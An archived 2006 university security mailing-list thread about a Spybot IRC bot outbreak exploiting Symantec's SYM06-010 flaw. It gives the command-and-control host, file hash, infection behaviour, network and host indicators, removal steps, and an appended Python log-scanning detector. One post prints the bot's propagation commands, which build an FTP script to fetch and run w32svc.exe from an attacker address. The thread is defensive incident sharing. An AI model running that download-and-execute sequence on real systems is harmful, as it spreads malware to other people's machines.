[unisog] More: Bot outbreak exploiting SYM06-010

Robin Stubbs mstubbs at facstaff.wisc.edu
Tue Nov 28 14:34:18 GMT 2006


Thanks so much for posting this, all of you who have shared info on this.

Someone here told me that this defect only affects managed installations.
Can someone verify that? I am concerned that Symantec does not state that, so
I am wondering if that is true.

Secondly, is it the case that there are no patches for this? So if someone has a vulnerable
version they have to uninstall it and install a new version? I would really not want to
rely on an antivirus product getting the upper hand when the virus is already getting
onto the system.

----- Original Message -----
From: "H. Morrow Long" <>
Date: Tuesday, November 28, 2006 8:12 am
Subject: Re: [unisog] More: Bot outbreak exploiting SYM06-010
To: UNIversity Security Operations Group <unisog at lists.dshield.org>


> Symantec sent out a bulletin to their Platinum
> customers last night detailing that there was a
> new version of the W32.Spybot worm exploiting
> SYM06-010 and pointing them to the malware
> description web page :
> 
>   http://www.symantec.com/avcenter/security/Content/2006.05.25.html
> 
> It says that signature files #61675 and later
> will be available today (11/28) with the sig
> of the new variant.
> 
> - H. Morrow Long, CISSP, CISM, CEH
>    University Information Security Officer
>    Director -- Information Security Office
>    Yale University, ITS
> 
> 
> 
> On Nov 28, 2006, at 12:09 AM, Liu, David wrote:
> 
> > Any idea on if the malware info has been made public on the Symantec
> > site?
> >
> > -----Original Message-----
> > From: unisog-bounces at lists.dshield.org
> > [mailto:unisog-bounces at lists.dshield.org] On Behalf Of Brian Eckman
> > Sent: Monday, November 27, 2006 7:02 PM
> > To: UNIversity Security Operations Group
> > Subject: [unisog] More: Bot outbreak exploiting SYM06-010
> >
> > We had a number of hosts become infected with an IRC bot today that used
> > www.flackware.info as the Command and Control. Here is information that
> > I know so far:
> >
> > ===================
> > Command and Control
> > ===================
> > . www.flackware.info:6667/tcp (the only apparent name/port used)
> > . (auto)JOIN #text airforce
> >
> > =========
> > File Info
> > =========
> > . MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
> > . w32svc.exe is 1.12 MB (1,182,208 bytes)  (MASSIVE for a bot!)
> > . Symantec definitions 11/27/2006 rev.50 and later will detect it as a
> > Spybot variant
> >
> > =============
> > How to Obtain
> > =============
> > The bot uses a built-in FTP server ("Reptile", a.k.a. "StnyFTPd") to
> > spread. When it compromises a machine, it executes the following
> > commands:
> >
> > echo open (ip address of attacker) (ftp server port) > i
> > echo user 1 1 >> i
> > echo get w32svc.exe >> i
> > echo quit >> i
> > ftp -As:i
> > w32svc.exe
> > exit
> >
> > ========
> > When Run
> > ========
> > . Installs itself to %WINDIR%\w32svc.exe
> > . Sets Windows File Protection to "Scan only at bootup"
> > . Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft\backup.ftp
> > and backup.tftp
> > . Drops a new ftp.exe and tftp.exe to %WINDIR%\System32\
> > . Attempts to connect to the Command and Control server
> > . Installs itself as a service in many places within the registry
> >
> > =================
> > Infection Vectors
> > =================
> > . Almost certainly via SYM06-010
> > . Almost certainly other Windows vulnerabilities (since patched)
> >
> > ==============================
> > Detecting Infections - Network
> > ==============================
> > . Looking for DNS queries for www.flackware.info
> > . Looking for network traffic to port 6667/tcp going to the IP address
> > for www.flackware.info
> > . Looking for scanning (more than 3-4 destinations) on port 2967/tcp
> >
> > =======================================
> > Identifying Infection - At the Computer
> > =======================================
> > . Look for %WINDIR%\w32svc.exe
> > . Look for a Service called "Windows Network Firewall"
> >
> > =======
> > Removal
> > =======
> > Symantec definitions 11/27/2006 rev.50 performed admirably on my test
> > box. Assuming the host did not have any other malware loaded onto it
> > after infection, updating the AV defs to that "rev" or later, scanning
> > the hard drive, then rebooting when prompted should do the trick.
> >
> > Manual Removal: Set the "Windows Network Firewall" service to
> > "Disabled", and reboot (you can't stop the service while it is running).
> > Delete the w32svc.exe file, and preferably, remove the associated
> > (dozens of) registry keys.
> >
> > Brian
> >
> > -- 
> > Brian Eckman, Security Analyst
> > University of Minnesota
> > Office of Information Technology
> > Security & Assurance
> >
> >
> > _______________________________________________
> > unisog mailing list
> > unisog at lists.dshield.org
> > https://lists.sans.org/mailman/listinfo/unisog
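The three network indicators from Brian Eckman's post (a DNS query for the C2 name, 6667/tcp to the address it resolves to, and 2967/tcp connections to several destinations) applied to flow logs, as an added example that is not from any of the posts; the log line format and the sample addresses are constructed assumptions.

```python
# Added example (not from the original posts); the log format below is assumed.
import re
from collections import defaultdict

C2_HOST = "www.flackware.info"   # C2 name named in the post
C2_PORT = 6667                   # IRC port named in the post
SCAN_PORT = 2967                 # port the bot scans (SYM06-010 service)
SCAN_MIN_TARGETS = 4             # post: "more than 3-4 destinations"

# Assumed log line format (one flow or DNS query per line):
#   <time> <src_ip> <dst_ip> <dst_port> <proto> [dns=<queried name>]
LINE_RE = re.compile(r"^\S+\s+(\S+)\s+(\S+)\s+(\d+)\s+(\S+)(?:\s+dns=(\S+))?\s*$")

# Constructed sample data (RFC 1918 / RFC 5737 addresses, not real hosts).
SAMPLE_LOG = """\
10:00:01 10.1.2.3 10.1.0.53 53 udp dns=www.flackware.info
10:00:02 10.1.2.3 203.0.113.10 6667 tcp
10:00:03 10.1.2.4 10.1.5.1 2967 tcp
10:00:03 10.1.2.4 10.1.5.2 2967 tcp
10:00:04 10.1.2.4 10.1.5.3 2967 tcp
10:00:04 10.1.2.4 10.1.5.4 2967 tcp
10:00:05 10.1.2.9 10.1.0.53 53 udp dns=www.example.org
10:00:06 10.1.2.9 10.1.5.1 2967 tcp
10:00:07 10.1.2.9 198.51.100.7 6667 tcp
"""


def find_suspect_hosts(log_text, c2_ip=None):
    """Map src_ip -> sorted indicator names. c2_ip is what www.flackware.info
    resolved to at the time; with None, any outbound 6667/tcp is flagged (noisier)."""
    reasons = defaultdict(set)
    scan_targets = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, dst, dport, proto, qname = m.groups()
        dport = int(dport)
        if qname and qname.lower().rstrip(".") == C2_HOST:
            reasons[src].add("dns-query-c2")
        if proto == "tcp" and dport == C2_PORT and (c2_ip is None or dst == c2_ip):
            reasons[src].add("irc-c2-connect")
        if proto == "tcp" and dport == SCAN_PORT:
            scan_targets[src].add(dst)
    # Scanning is judged on distinct destinations, so retries to one host don't count.
    for src, targets in scan_targets.items():
        if len(targets) >= SCAN_MIN_TARGETS:
            reasons[src].add("scan-2967")
    return {host: sorted(r) for host, r in reasons.items()}
```

The host-side checks from the post (%WINDIR%\w32svc.exe and the "Windows Network Firewall" service) are the confirmation step once a host is flagged here.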

